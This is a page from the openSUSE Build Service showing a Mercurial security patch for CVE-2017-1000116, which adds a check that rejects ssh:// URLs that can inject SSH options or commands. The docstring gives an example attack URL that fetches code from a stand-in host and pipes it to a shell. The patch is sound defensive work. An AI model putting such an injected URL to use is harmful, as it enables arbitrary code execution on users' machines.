Sign Up
Log In
Log In
or
Sign Up
Places
All Projects
Status Monitor
Collapse sidebar
SUSE:SLE-12-SP2:GA
mercurial
CVE-2017-1000116-0002.patch
Overview
Repositories
Revisions
Requests
Users
Attributes
Meta
File CVE-2017-1000116-0002.patch of Package mercurial
# HG changeset patch # User Sean Farley <sean@farley.io> # Date 1501284745 25200 # Fri Jul 28 16:32:25 2017 -0700 # Branch stable # Node ID 53224b1ffbc2438941e8e50375f532f2603c8f0f # Parent 20bac46f7744494507a0dde8dd606b440d9df439 util: add utility method to check for bad ssh urls (SEC) Our use of SSH has an exploit that will parse the first part of an url blindly as a hostname. Prior to this set of security patches, a url with '-oProxyCommand' could run arbitrary code on a user's machine. In addition, at least on Windows, a pipe '|' can be abused to execute arbitrary commands in a similar fashion. We defend against this by checking ssh:// URLs and looking for a hostname that starts with a - or contains a |. When this happens, let's throw a big abort into the user's face so that they can inspect what's going on. --- mercurial/util.py | 15 +++++++++++++++ 1 file changed, 15 insertions(+) --- a/mercurial/util.py +++ b/mercurial/util.py @@ -1884,6 +1884,21 @@ def hasdriveletter(path): def urllocalpath(path): return url(path, parsequery=False, parsefragment=False).localpath() +def checksafessh(path): + """check if a path / url is a potentially unsafe ssh exploit (SEC) + + This is a sanity check for ssh urls. ssh will parse the first item as + an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. + Let's prevent these potentially exploited urls entirely and warn the + user. + + Raises an error.Abort when the url is unsafe. + """ + path = urllib.unquote(path) + if path.startswith('ssh://-') or '|' in path: + raise error.Abort(_('potentially unsafe url: %r') % + (path,)) + def hidepassword(u): '''hide user credential in a url string''' u = url(u)
Locations
Projects
Search
Status Monitor
Help
OpenBuildService.org
Documentation
API Documentation
Code of Conduct
Contact
Support
@OBShq
Terms
openSUSE Build Service is sponsored by
The Open Build Service is an
openSUSE project
.
Sign Up
Log In
Places
Places
All Projects
Status Monitor